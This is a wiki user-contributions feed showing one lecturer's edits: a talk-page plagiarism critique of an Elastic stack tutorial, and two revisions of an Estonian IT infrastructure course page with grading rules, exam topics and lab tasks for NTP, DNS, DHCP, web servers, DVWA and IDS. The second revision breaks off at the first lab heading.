ICO wiki - User contributions [en]

Talk:Logging and monitoring with Elastic stack on Ubuntu 16.04

2017-06-20T09:39:04Z

Mernits:

There is no citations.
Seems that author copied/pasted large part of this wiki from https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-ubuntu-16-04/ without any citation/credit to original author. Seems that this is a case of https://en.wikipedia.org/wiki/Plagiarism

I can't see author's contribution!

No summary or conclusions.

Some mistakes: <code> cd /etc/elasticsearch/ <code> <--no closing tag.

Sometimes is not clear (for beginners) on which machine is used for entering commands.

Author mentioned a CentOS 7 but no commands related to this OS. (copy paste error?)

Talk:Logging and monitoring with Elastic stack on Ubuntu 16.04

2017-06-20T09:37:59Z

Mernits:

There is no citations.
Seems that author copied/pasted large part of this wiki from https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-ubuntu-16-04/ without any citation/credit to original author.

I can't see author's contribution!

No summary or conclusions.

Some mistakes: <code> cd /etc/elasticsearch/ <code> <--no closing tag.

Sometimes is not clear (for beginners) on which machine is used for entering commands.

Author mentioned a CentOS 7 but no commands related to this OS. (copy paste error?)

Talk:Logging and monitoring with Elastic stack on Ubuntu 16.04

2017-06-20T09:26:22Z

Mernits:

There is no citations.

Author mentioned a CentOS 7 but no commands related to this OS.

Seems that author copied/pasted large part of this wiki from https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-ubuntu-16-04/ without any citation/credit to original author.

I can't see author's contribution!

No summary or conclusions.

Some mistakes: <code> cd /etc/elasticsearch/ <code> <--no closing tag.

Talk:Logging and monitoring with Elastic stack on Ubuntu 16.04

2017-06-20T09:25:11Z

Mernits: Created page with "There is no citations. Author mentioned a CentOS 7 but no commands related to this OS. Seems that author copied/pasted large part of this wiki from https://www.howtoforge.c..."

BlidSQL Guide

2017-06-05T07:09:21Z

Mernits: Mernits moved page BlidSQL Guide to BlindSQL Guide

#REDIRECT [[BlindSQL Guide]]

BlindSQL Guide

2017-06-05T07:09:21Z

Mernits: Mernits moved page BlidSQL Guide to BlindSQL Guide

Õpijuhis on täiendamisel ning lisandub antud lehele kuupäevaks 06.06.2017.

BlidSQL Material

2017-06-05T07:08:46Z

Mernits: Mernits moved page BlidSQL Material to BlindSQL Material

#REDIRECT [[BlindSQL Material]]

BlindSQL Material

2017-06-05T07:08:46Z

Mernits: Mernits moved page BlidSQL Material to BlindSQL Material

Õpimaterjal on täiendamisel ning lisandub antud lehele kuupäevaks 06.06.17.

Introduction to Cyber Security

2015-11-29T16:51:28Z

Mernits: Created page with " = Introduction to Cyber Security = This page is under construction. == Introduction == == Lectures == == Practical classes == = Homework = = Grading ="

= Introduction to Cyber Security =

This page is under construction.

== Introduction ==

== Lectures ==

== Practical classes ==

= Homework =

= Grading =

Category:I375/I803/I853 IT Infrastructure services

2015-06-13T09:19:01Z

Mernits: /* Referaadi teemad 2015 */

==Üldinfo==

Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

===Õppejõud===

Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

==Eesmärk ja sisu==

Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

==Ainekaart==

Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

==Eelmiste aastate tagasiside==

[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

==Arvestus ja hindamine==

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

===Tähtajad päevaõppele 2015===

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

===Tähtajad kaugõppele 2015===

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

==Loengud==

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

==Mõisted kontrolltööks ja arvestuseks==

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi

<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;
</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

==Dokumentatsioon==

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

==Referaadi teemad 2015==

*[[mod_proxy]]
*[[w3af]]
*[[aptly]] -- http://www.aptly.info/
*[[dnf]] -- DNF package manager
*[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameetrid
*[[sqlmap]]
*[[Kippo SSH Honeypot]]
*[[p0f]] http://tools.kali.org/information-gathering/p0f
*[[hping]] http://www.hping.org/
*[[Yersinia]] - http://www.yersinia.net/
*[[WPScan]] - http://wpscan.org/
*[[Aircrack]]
*[[ntop]]
*[[Nikto]]
*[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>
*[[DigiNotar]]
*[[Ipkungfu Tulemüür]]
*[[iodine]]
*[[fabric]]
*[[mpstat]]
*[[arpwatch]]
*[[ss]]
*[[glances]]
*[[mod_status]]
*[[smoothwall]]
*[[squid]]
*[[split DNS]]
*[[Openssl ja Subject Alternative Name]]
*[[dotDefender]]

==Abimaterjal==
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

==Praktilised tööd==

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

===Sissejuhatav praktikum===

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
nano /etc/network/interfaces
<pre>
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</pre>

Taaskäivitage võrguliides '''eth1'''

ifdown eth1 && ifup eth1

Muutke DNS serveril hostinimi ns.sinudomeen.

echo ns > /etc/hostname

Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

Käivitage teenus '''hostname'''

service hostname start

Korraldus hostname -f peab tagastama FQDN-i

hostname -f

Seadistage ka [[OpenSSH:_võtmetega_autentimine| võtmetepõhine autentimine]].

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

===Labor 1 - NTP seadistamine (6p/6%)===

Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha [https://www.us-cert.gov/ncas/alerts/TA14-013A siin] kirjeldatud rünnet.

[[NTP Ubuntus]]

===Labor 2 - DNS seadistamine (6p/6%)===

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS Näitelahendus 1]

[[Nimeserveri labor V.2| DNS Näitelahendus 2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

===Labor 3 - DHCP seadistamine (6p/6%)===
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

===Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)===
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimed peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

===Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)===

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme Wordpress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

Wordpress paigaldamine ja jõudluse testimine (varnish)
*[https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1 Wordpress paigaldamine]
**[[WordPress turvamine| Wordpress turvamine]]
**[http://wpdevshed.com/top-cache-plugins-wordpress/ Wordpress caching plugins]
**[[Varnish]]
***[[Apache logide seadistus]]

===Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)===

Paigaldage [[DVWA]].

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

===Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)===

===Labor 8 - IDS (10p/10%)===

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

[[IDS_Systeemid_-_Labor_1| IDS Näitelahendus]]

[[Suricata| Abistav materjal]]

===Questid, millede eest saab punkte===

[https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing Quest 1 (Läbi ja tehtud)]

==Esitatud referaadid==
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

==Juurteenuste kursus==
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

==Täiendav lugemismaterjal==
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

==Vanad loengumaterjalid==

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-06-09T20:36:57Z

Mernits: /* Referaadi teemad 2015 */

==Üldinfo==

Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

===Õppejõud===

Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

==Eesmärk ja sisu==

Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

==Ainekaart==

Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

==Eelmiste aastate tagasiside==

[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

==Arvestus ja hindamine==

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

===Tähtajad päevaõppele 2015===

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

===Tähtajad kaugõppele 2015===

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

==Loengud==

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

==Mõisted kontrolltööks ja arvestuseks==

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi

<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;
</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

==Dokumentatsioon==

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

==Referaadi teemad 2015==

*[[w3af]]
*[[aptly]] -- http://www.aptly.info/
*[[dnf]] -- DNF package manager
*[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameetrid
*[[sqlmap]]
*[[Kippo SSH Honeypot]]
*[[p0f]] http://tools.kali.org/information-gathering/p0f
*[[hping]] http://www.hping.org/
*[[Yersinia]] - http://www.yersinia.net/
*[[WPScan]] - http://wpscan.org/
*[[Aircrack]]
*[[ntop]]
*[[Nikto]]
*[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>
*[[DigiNotar]]
*[[Ipkungfu Tulemüür]]
*[[iodine]]
*[[fabric]]
*[[mpstat]]
*[[arpwatch]]
*[[ss]]
*[[glances]]
*[[mod_status]]
*[[smoothwall]]
*[[squid]]

==Abimaterjal==
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

==Praktilised tööd==

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

===Sissejuhatav praktikum===

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
nano /etc/network/interfaces
<pre>
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</pre>

Taaskäivitage võrguliides '''eth1'''

ifdown eth1 && ifup eth1

Muutke DNS serveril hostinimi ns.sinudomeen.

echo ns > /etc/hostname

Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

Käivitage teenus '''hostname'''

service hostname start

Korraldus hostname -f peab tagastama FQDN-i

hostname -f

Seadistage ka [[OpenSSH:_võtmetega_autentimine| võtmetepõhine autentimine]].

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

===Labor 1 - NTP seadistamine (6p/6%)===

